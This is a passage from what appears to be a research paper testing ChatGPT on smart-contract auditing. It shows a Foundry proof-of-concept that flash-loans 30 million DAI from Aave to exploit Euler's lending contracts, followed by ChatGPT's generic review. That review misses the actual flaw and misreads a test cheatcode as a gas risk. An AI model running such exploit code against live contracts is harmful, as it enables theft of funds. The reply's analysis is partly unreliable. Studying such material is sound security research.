        DToken dDAI = DToken(0x6085Bc95F506c326DCBCD7A6dd6c79FBc18d4686);
        IEuler Euler = IEuler(0xf43ce1d09050BAfd6980dD43Cde2aB9F18C85b34);
        IAaveFlashloan AaveV2 = IAaveFlashloan(0x7d2768dE32b0b80b7a3454c06BdAc94A69DDc7A9);
        address Euler_Protocol = 0x27182842E098f60e3D 576794A5bFFb0777E025d3;
        Iviolator violator;
        Iliquidator liquidator;
    
    
        function setUp() public {
            vm.createSelectFork("eth", 16817995);
            vm.label(address(DAI), "DAI");
            vm.label(address(eDAI), "eDAI");
            vm.label(address(dDAI), "dDAI");
            vm.label(address(Euler), "Euler");
            vm.label(address(AaveV2), "AaveV2");
        }
    
        function testExploit() public {
            emit log_named_decimal_uint("Attacker DAI balance before exploit", DAI.balanceOf(address(this)), DAI.decimals());
    
            uint256 aaveFlashLoanAmount = 30_000_000 * 1e18;
            address[] memory assets = new address[](1);
            assets[0] = address(DAI);
            uint256[] memory amounts = new uint256[](1);
            amounts[0] = aaveFlashLoanAmount;
            uint256[] memory modes = new uint[](1);
            modes[0] = 0;
            bytes memory params =
            abi.encode(30_000_000, 200_000_000, 100_000_000, 44_000_000, address(DAI), address(eDAI), address(dDAI));
            AaveV2.flashLoan(address(this), assets, amounts, modes, address(this), params, 0);
    
            emit log_named_decimal_uint("Attacker DAI balance after exploit", DAI.balanceOf(address(this)), DAI.decimals());
        }
    
        function executeOperation(
            address[] calldata assets,
            uint256[] calldata amounts,
            uint256[] calldata premiums,
            address initator,
            bytes calldata params
        ) external returns (bool) {
            DAI.approve(address(AaveV2), type(uint256).max);
            violator = new Iviolator();
            liquidator = new Iliquidator();
            DAI.transfer(address(violator), DAI.balanceOf(address(this)));
            violator.violator();
            liquidator.liquidate(address(liquidator), address(violator));
            return true;
        }
    }
\end{lstlisting}
  }
\end{shaded*}
\vspace{-2.0em}
\colorlet{shadecolor}{green!5}
\begin{shaded*}
\setlength{\parindent}{0em}
{\footnotesize 
  \noindent{\bf Reply from ChatGPT:} The provided contract is quite complex, involving several interfaces and contracts. There are several points of potential vulnerability and concern:
  \begin{itemize}
      \item External Calls and Untrusted Contracts: The contracts interact with external contracts and interfaces (IAaveFlashloan, IEuler, EToken, DToken, IERC20). If any of these external contracts have vulnerabilities or behave unexpectedly, they could compromise the security of this contract.
      \item Flash Loan Usage: Flash loans introduce additional complexity and potential risks. The testExploit function utilizes a flash loan from Aave to exploit the contract. Flash loans can be powerful tools, but they also open up the possibility of reentrancy attacks and unexpected behavior if not handled carefully.
      \item Unchecked Transfer: There is a potential vulnerability in the Iliquidator contract's liquidate function. It transfers DAI tokens using DAI.transfer, which does not check the return value. If the transfer fails for any reason, the funds would be stuck in the contract, leading to a potential loss of funds.
      \item Lack of Access Control: The violator contract does not restrict access to the violator function, which means anyone can call it. Depending on what this function does and how it interacts with other contracts, it could lead to unauthorized actions or exploits.
      \item Potential Gas Limit Issues: The setUp function utilizes a vm.createSelectFork function, which could potentially consume a significant amount of gas depending on its implementation. Gas limits should be carefully considered, especially if this function is called frequently.
  \end{itemize}
	
To enhance security:
\begin{itemize}
    \item Perform thorough testing, including unit tests and integration tests, to identify and address potential vulnerabilities.
    \item Ensure that all external calls are handled securely, including proper error handling and checking return values.
    \item Implement access controls to restrict sensitive functions to authorized users only.
    \item Consider using standardized contracts and interfaces where possible to reduce the risk of vulnerabilities.
    \item Use flash loans cautiously and implement proper safeguards to mitigate potential risks associated with flash loan usage.
\end{itemize}	

}\end{shaded*}

\end{document}